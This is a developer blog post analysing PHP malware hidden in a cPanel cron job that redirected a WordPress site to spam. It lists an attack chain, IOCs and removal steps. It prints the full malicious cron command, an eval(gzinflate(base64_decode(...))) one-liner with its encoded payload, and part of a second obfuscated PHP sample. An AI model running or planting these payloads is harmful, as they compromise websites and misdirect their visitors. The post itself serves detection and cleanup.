DEV Community

MD Pabel
MD Pabel

Posted on • Originally published at mdpabel.com on

PHP Cron Job Malware

#cybersecurity #php #security #wordpress

Technical Analysis

The malware was embedded in a cPanel cron job. It executed a PHP script that used 'eval' with 'gzinflate' and 'base64_decode' to execute obfuscated code. This generated malicious files that caused the website to redirect to spam sites. The cron job was the root cause, regenerating the malicious payload even after removal.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. A cron job executes a PHP script at scheduled intervals.
  2. The PHP script uses 'eval(gzinflate(base64_decode()))' to decode and execute hidden malicious code.
  3. The executed code generates malicious files, redirecting the site to spam URLs.

Code Signature(s)

FILE: cron-command.bash 

/usr/local/bin/php -r 'eval(gzinflate(base64_decode("jVJrb6JAFP3ur2ATEzRtNiCtptk0u9WKq2JpUXm42RgchjIyDBQGBTb97zvgs49kdz4wd5h7zj1z7q1FXtQLiavbGDk2hQ3emoWCSmikru86oAhbD7MQKS1vszLmG8sceVYw8kBLTpzBIrICPVekrmgFWWSJN6EzEBNFcraKgVOrlYmLgV4okoZXZjexTA0rRraxDA0DdL21f94hteW3JzNaqGv/SkWji4W58FYyhWbPAyuc5eY0AuPqrDljvPVNkXYVPXJgsbgxxGtgiMKLKdOVibfE7I1YDgUjcYvMuTfX5a476VutpxnYTvT9f51xySLLy5wSP9YZvsfkrakzXtMLkA879izMVWnSnhTD9tDvYieQk3FPc+eCPtV9fWrkzlCXtSez6A4e/L40ue8Tc+p3huvSs0npWVF65uJrAPIoWqCrF9t8cEFwg1aSVpR1oZQBFQvxWM467n0YuYGAVEm45Zvfam5KAEUh4d53pp7AuMn9qdU4tjBKKNeouynGjzb1Lrl6kicUBn2yYTEIHci2yKYUxqTJ3XIpYWjEqArYWNkJbF8tHVim7WhZ3ZK1noRpDCDLdxGGy2dIlyAkFBKanGrtc5HLNaIYPi8DmwKv8ab+jqZZquX2K4Y0jckO+nok+HLOsJd7xLOguoHJP5h22hEBYRxDQDX4DDP2hoTGyxhG2AZsrCHPfeX4jV1tmL/k+B/f7TiujnbOnxt4MIPA7fTgR6XzQPauFOPiT4/+BHwu5PCkX8LvfaOYgsefj8u+qrDo7fWRZM96+nww79z+E+x/fCtbHVAUHNpexWft5i44UdjBUoIR8T+MQjUsUfrZsHzyCBqmpeCzjGNVlvFa+ws=")));'
Enter fullscreen mode Exit fullscreen mode

FILE: sample.txt 

<?php
$wp_link_pages_yb = array ('7X15W9tI8vD/+RTCkx3Z','gzG2gUyCMTkIJOSAhCMn','WT+yDltYF5KMbTL57m9V','d0vqllq2IZnZ/T3vMkOw','u6urq6ur7zru3Q/GkTEx','tYE/ti+VrlLZsB5t9R+0','Hhlmf6NpPdT1pv7nVktr','P9AfmQ+a7YePTOths918','YPSbza12X3vYapkb7Xbr','oaWbD/Wth5XOvfuBHXqa','bluDPmL8zbC2MLXvGr42','hRT1wHbM6K3mqZB6Y9x4','9lUczAZ+DHlxODYhdTod','etGNjsDnZwdrDxHSG400','+3I4G44x3TW2qvd7p/sn','H/ZPvqovz87e9c7hW+/p','i/2jM/VbrXPvnm0pVdMN','4hkAvjs+Pfuqzvqm6VxC','bk35fk+Bn3wGIE7q7tz7','QVGs2FFkxoBj7/j49eH+','V0nNLwEJYFUaSkWLPdd3','KlkVk+GVPbxxr6fVpQrW','Fb6htYyKpCXlTU4bNQ6d','mekY8diJxtAiLQy1WbXy','wvcHjgkVVE6dcRjgh7en','R8/8GD/ZWk8L9aF9bYb4','9bPmGeYUP51obt+BRKAE','cSMpQWgOeq4W68Oquq4C','7bYbOL5hVtW/1LpYO7ZM','XbcxeQnC8WdoaoYZVgnU','eqvRVDabm8oRyMaBP/YM','lZGBP+bUjum3H4Wuor3q','muMRhx4hRAB/Nhlo0xwF','+UzgoK373nW1Mo6ttYfY','QzmpqSuhNw36Y72AGGFv','KTZJk+QUO/ogHJYQzPLu','Qi8r+svJDXzDvTFK6E0y','70JwUvaXUxzH3k14VUJx','knkXipOyv14kAtcZlYkE','zbuTSNCiP0EuDMp71tjT','Y9v3MvRaFF9Px4D2cnLj','TD1zqKfzVpoC9Pa1yHyw','2TM9HWcWDphiZ2gyQMOk','gDQ9gXJszXIuh+PxDa5E','FZaqD/qX2pVhjvvDSz79','KjY1PbyJr0cOwjc7bAKH','5Uqpirk7ShSHjumlFfLc','t/wQ4N3YDa/C2cQmqBTu','e1aYaxYHsLrKYys2RB+G','VT80krq/CqRBb/xbIbkp','8q8Z6rR7UswCMxpdvqoc','JF/L6qqYiWIpcmi3O49F','yU8/NLWRiOrHPfETiBH+','Cc14HHr57uapp4vlE9uz','ezg+VDMM/bDn+ANYfryx','40B+lgnJPQIQQW5TyHK1','ac+cmvoYBbcX266ZgEA2','+d5zbNeOq81klwGrZoSw','uu8GWmhW371814NBcnp4','fFRX1K3GRqMJKNQdNeUB','QeVqA1vvXY392Ix64dhD','1AQpjpzFeP9sbBbwYqlB','HvUg0KsEIpPQZFjqmjt1','h9dTrXp/6gwnAyPM9xLj','ux316D4ig3tMdxZQV1BV','U0S41qcg2ygDdhA5WjQ0','o6xsh+vj3KSF8p0RRZI4','8GQyykHRRH7mSVt4M5n1','+wO7X00aZthmtbIDY9RV','XDMe+kY38KN4d8f2gnGs','xLPA7AZaFE1gDCme5tJv','QnY07kP3K9eaMza76u6u','uruzjvh2K7Tv0rqzvd/9','a8sKL2277wbAn6vAvjYm','s5l2lW1E2STLAZLdaAZK','Gwdyo/v+CNpQirKwZ+T3','+HN2Q9hOnMx//12pDqHD','quoAGKNmi0UC0AW6pDiX','3e/Wc+U7/EC/3Z4byPnr','L2UpSGVlHt2ZnPDrFxID','Ihz7jj+BbSn0PHwj4/D4','FCaFurJRI/yoTGyvknam','dROORtF4HM7G5MADmXCC','+aGYTmSWwXj2VKUj/354','aQ3jqytIJZPSACelSLPM','ngtzHm6BCY
Enter fullscreen mode Exit fullscreen mode

Indicators of Compromise (IOCs)

  • /usr/local/bin/php -r 'eval
  • gzinflate(base64_decode
  • spam sites

Removal Protocol

  1. Access the cPanel account and navigate to the Cron Jobs section.
  2. Locate and delete the cron job executing the PHP script responsible for malware.
  3. Manually search for and remove any generated malicious files in the website's directory.
  4. Scan the website for any remaining backdoors or vulnerabilities.

Status: Active Threat.

Verification: Verified by MD Pabel.

Top comments (0)